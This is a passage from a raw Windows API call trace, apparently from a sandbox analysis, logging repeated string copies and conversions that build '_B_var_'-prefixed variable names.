dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_LA1A4cD") returned 15 [0070.072] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cc00ee | out: _Dst=0x144ec0) returned 0x0 [0070.072] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="tAQAAQ" | out: _Dst="tAQAAQ") returned 0x0 [0070.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="tAQAAQ") returned 7 [0070.072] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cc0116 | out: _Dst=0x67c2d20) returned 0x0 [0070.072] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_tAQAAQ" | out: _Dst="_B_var_tAQAAQ") returned 0x0 [0070.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_tAQAAQ") returned 14 [0070.072] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cc0116 | out: _Dst=0x144ec0) returned 0x0 [0070.072] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="h_QQU4" | out: _Dst="h_QQU4") returned 0x0 [0070.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="h_QQU4") returned 7 [0070.073] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cc013e | out: _Dst=0x67c2d20) returned 0x0 [0070.073] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_h_QQU4" | out: _Dst="_B_var_h_QQU4") returned 0x0 [0070.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_h_QQU4") returned 14 [0070.073] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cc013e | out: _Dst=0x144ec0) returned 0x0 [0070.073] IMalloc:Realloc (This=0x7fefec05380, pv=0x6288170, cb=0x4000) returned 0xafdde80 [0070.073] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d20) returned 0x0 [0070.073] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d20) returned 0x0 [0070.073] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d20) returned 0x0 [0070.073] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="iAAUQA" | out: _Dst="iAAUQA") returned 0x0 [0070.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="iAAUQA") returned 7 [0070.073] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cc009e | out: _Dst=0x67c2d20) returned 0x0 [0070.073] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_iAAUQA" | out: _Dst="_B_var_iAAUQA") returned 0x0 [0070.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_iAAUQA") returned 14 [0070.073] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cc009e | out: _Dst=0x144ec0) returned 0x0 [0070.073] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="BUoAA_AU" | out: _Dst="BUoAA_AU") returned 0x0 [0070.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="BUoAA_AU") returned 9 [0070.074] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cc0192 | out: _Dst=0x67c2d20) returned 0x0 [0070.074] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_BUoAA_AU" | out: _Dst="_B_var_BUoAA_AU") returned 0x0 [0070.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_BUoAA_AU") returned 16 [0070.074] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cc0192 | out: _Dst=0x144ec0) returned 0x0 [0070.074] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="lAAxAQXA" | out: _Dst="lAAxAQXA") returned 0x0 [0070.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="lAAxAQXA") returned 9 [0070.074] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cc0166 | out: _Dst=0x67c2d20) returned 0x0 [0070.074] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_lAAxAQXA" | out: _Dst="_B_var_lAAxAQXA") returned 0x0 [0070.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_lAAxAQXA") returned 16 [0070.074] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cc0166 | out: _Dst=0x144ec0) returned 0x0 [0070.074] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="bD4QAoAU" | out: _Dst="bD4QAoAU") returned 0x0 [0070.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="bD4QAoAU") returned 9 [0070.074] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cc01be | out: _Dst=0x67c2d20) returned 0x0 [0070.074] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_bD4QAoAU" | out: _Dst="_B_var_bD4QAoAU") returned 0x0 [0070.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_bD4QAoAU") returned 16 [0070.074] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cc01be | out: _Dst=0x144ec0) returned 0x0 [0070.074] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="zA_ADA" | out: _Dst="zA_ADA") returned 0x0 [0070.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="zA_ADA") returned 7 [0070.075] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cc01ea | out: _Dst=0x67c2d20) returned 0x0 [0070.075] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_zA_ADA" | out: _Dst="_B_var_zA_ADA") returned 0x0 [0070.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_zA_ADA") returned 14 [0070.075] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cc01ea | out: _Dst=0x144ec0) returned 0x0 [0070.075] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="i1ABABB" | out: _Dst="i1ABABB") returned 0x0 [0070.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="i1ABABB") returned 8 [0070.075] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cc023e | out: _Dst=0x67c2d20) returned 0x0 [0070.075] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_i1ABABB" | out: _Dst="_B_var_i1ABABB") returned 0x0 [0070.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_i1ABABB") returned 15 [0070.075] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cc023e | out: _Dst=0x144ec0) returned 0x0 [0070.075] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="bACkAAAA" | out: _Dst="bACkAAAA") returned 0x0 [0070.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="bACkAAAA") returned 9 [0070.075] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cc0212 | out: _Dst=0x67c2d20) returned 0x0 [0070.075] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_bACkAAAA" | out: _Dst="_B_var_bACkAAAA") returned 0x0 [0070.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_bACkAAAA") returned 16 [0070.075] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cc0212 | out: _Dst=0x144ec0) returned 0x0 [0070.075] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="HAAAAkBC" | out: _Dst="HAAAAkBC") returned 0x0 [0070.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="HAAAAkBC") returned 9 [0070.076] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cc028e | out: _Dst=0x67c2d20) returned 0x0 [0070.076] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_HAAAAkBC" | out: _Dst="_B_var_HAAAAkBC") returned 0x0 [0070.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_HAAAAkBC") returned 16 [0070.076] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cc028e | out: _Dst=0x144ec0) returned 0x0 [0070.076] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="H_cx4AB" | out: _Dst="H_cx4AB") returned 0x0 [0070.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="H_cx4AB") returned 8 [0070.076] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cc02ba | out: _Dst=0x67c2d20) returned 0x0 [0070.076] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_H_cx4AB" | out: _Dst="_B_var_H_cx4AB") returned 0x0 [0070.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_H_cx4AB") returned 15 [0070.076] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cc02ba | out: _Dst=0x144ec0) returned 0x0 [0070.076] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="UDAAAA" | out: _Dst="UDAAAA") returned 0x0 [0070.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="UDAAAA") returned 7 [0070.076] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cc02e2 | out: _Dst=0x67c2d20) returned 0x0 [0070.076] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_UDAAAA" | out: _Dst="_B_var_UDAAAA") returned 0x0 [0070.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_UDAAAA") returned 14 [0070.076] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cc02e2 | out: _Dst=0x144ec0) returned 0x0 [0070.076] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="nDAAwAx" | out: _Dst="nDAAwAx") returned 0x0 [0070.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="nDAAwAx") returned 8 [0070.077] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cc030a | out: _Dst=0x67c2d20) returned 0x0 [0070.077] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_nDAAwAx" | out: _Dst="_B_var_nDAAwAx") returned 0x0 [0070.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_nDAAwAx") returned 15 [0070.077] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cc030a | out: _Dst=0x144ec0) returned 0x0 [0070.077] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d20) returned 0x0 [0070.077] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d20) returned 0x0 [0070.077] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d20) returned 0x0 [0070.077] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="YDkoGA4" | out: _Dst="YDkoGA4") returned 0x0 [0070.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="YDkoGA4") returned 8 [0070.077] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cc0266 | out: _Dst=0x67c2d20) returned 0x0 [0070.077] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_YDkoGA4" | out: _Dst="_B_var_YDkoGA4") returned 0x0 [0070.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_YDkoGA4") returned 15 [0070.077] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cc0266 | out: _Dst=0x144ec0) returned 0x0 [0070.078] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="iAUGAAcQ" | out: _Dst="iAUGAAcQ") returned 0x0 [0070.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="iAUGAAcQ") returned 9 [0070.078] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cc035a | out: _Dst=0x67c2d20) returned 0x0 [0070.078] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_iAUGAAcQ" | out: _Dst="_B_var_iAUGAAcQ") returned 0x0 [0070.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_iAUGAAcQ") returned 16 [0070.078] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cc035a | out: _Dst=0x144ec0) returned 0x0 [0070.078] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="iAXBBA" | out: _Dst="iAXBBA") returned 0x0 [0070.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="iAXBBA") returned 7 [0070.078] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cc0332 | out: _Dst=0x67c2d20) returned 0x0 [0070.078] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_iAXBBA" | out: _Dst="_B_var_iAXBBA") returned 0x0 [0070.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_iAXBBA") returned 14 [0070.079] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cc0332 | out: _Dst=0x144ec0) returned 0x0 [0070.079] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="Ak4BAD" | out: _Dst="Ak4BAD") returned 0x0 [0070.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="Ak4BAD") returned 7 [0070.079] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cc0386 | out: _Dst=0x67c2d20) returned 0x0 [0070.079] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_Ak4BAD" | out: _Dst="_B_var_Ak4BAD") returned 0x0 [0070.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_Ak4BAD") returned 14 [0070.079] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cc0386 | out: _Dst=0x144ec0) returned 0x0 [0070.079] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="DAQAACD" | out: _Dst="DAQAACD") returned 0x0 [0070.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="DAQAACD") returned 8 [0070.079] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cc03ae | out: _Dst=0x67c2d20) returned 0x0 [0070.079] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_DAQAACD" | out: _Dst="_B_var_DAQAACD") returned 0x0 [0070.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_DAQAACD") returned 15 [0070.079] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cc03ae | out: _Dst=0x144ec0) returned 0x0 [0070.079] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="CAXkkA" | out: _Dst="CAXkkA") returned 0x0 [0070.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="CAXkkA") returned 7 [0070.079] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cc03fe | out: _Dst=0x67c2d20) returned 0x0 [0070.079] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_CAXkkA" | out: _Dst="_B_var_CAXkkA") returned 0x0 [0070.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_CAXkkA") returned 14 [0070.079] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cc03fe | out: _Dst=0x144ec0) returned 0x0 [0070.080] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="QQ_QAAx" | out: _Dst="QQ_QAAx") returned 0x0 [0070.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="QQ_QAAx") returned 8 [0070.080] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cc03d6 | out: _Dst=0x67c2d20) returned 0x0 [0070.080] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_QQ_QAAx" | out: _Dst="_B_var_QQ_QAAx") returned 0x0 [0070.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_QQ_QAAx") returned 15 [0070.080] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cc03d6 | out: _Dst=0x144ec0) returned 0x0 [0070.080] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="CAAUAkB4" | out: _Dst="CAAUAkB4") returned 0x0 [0070.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="CAAUAkB4") returned 9 [0070.080] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cc044e | out: _Dst=0x67c2d20) returned 0x0 [0070.080] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_CAAUAkB4" | out: _Dst="_B_var_CAAUAkB4") returned 0x0 [0070.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_CAAUAkB4") returned 16 [0070.080] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cc044e | out: _Dst=0x144ec0) returned 0x0 [0070.080] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="Lkk1AoU" | out: _Dst="Lkk1AoU") returned 0x0 [0070.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="Lkk1AoU") returned 8 [0070.080] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cc047a | out: _Dst=0x67c2d20) returned 0x0 [0070.081] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_Lkk1AoU" | out: _Dst="_B_var_Lkk1AoU") returned 0x0 [0070.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_Lkk1AoU") returned 15 [0070.081] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cc047a | out: _Dst=0x144ec0) returned 0x0 [0070.081] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="kQUZ4A" | out: _Dst="kQUZ4A") returned 0x0 [0070.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="kQUZ4A") returned 7 [0070.081] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cc04a2 | out: _Dst=0x67c2d20) returned 0x0 [0070.081] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_kQUZ4A" | out: _Dst="_B_var_kQUZ4A") returned 0x0 [0070.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_kQUZ4A") returned 14 [0070.081] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cc04a2 | out: _Dst=0x144ec0) returned 0x0 [0070.081] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="PBAAAAc" | out: _Dst="PBAAAAc") returned 0x0 [0070.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="PBAAAAc") returned 8 [0070.081] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cc04ca | out: _Dst=0x67c2d20) returned 0x0 [0070.081] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_PBAAAAc" | out: _Dst="_B_var_PBAAAAc") returned 0x0 [0070.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_PBAAAAc") returned 15 [0070.081] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cc04ca | out: _Dst=0x144ec0) returned 0x0 [0070.081] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d20) returned 0x0 [0070.081] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d20) returned 0x0 [0070.081] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d20) returned 0x0 [0070.082] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="iQBAAA" | out: _Dst="iQBAAA") returned 0x0 [0070.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="iQBAAA") returned 7 [0070.082] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cc0426 | out: _Dst=0x67c2d20) returned 0x0 [0070.082] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_iQBAAA" | out: _Dst="_B_var_iQBAAA") returned 0x0 [0070.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_iQBAAA") returned 14 [0070.082] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cc0426 | out: _Dst=0x144ec0) returned 0x0 [0070.082] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="dADxADkA" | out: _Dst="dADxADkA") returned 0x0 [0070.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="dADxADkA") returned 9 [0070.082] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cc051e | out: _Dst=0x67c2d20) returned 0x0 [0070.082] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_dADxADkA" | out: _Dst="_B_var_dADxADkA") returned 0x0 [0070.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_dADxADkA") returned 16 [0070.082] _mbscpy_s 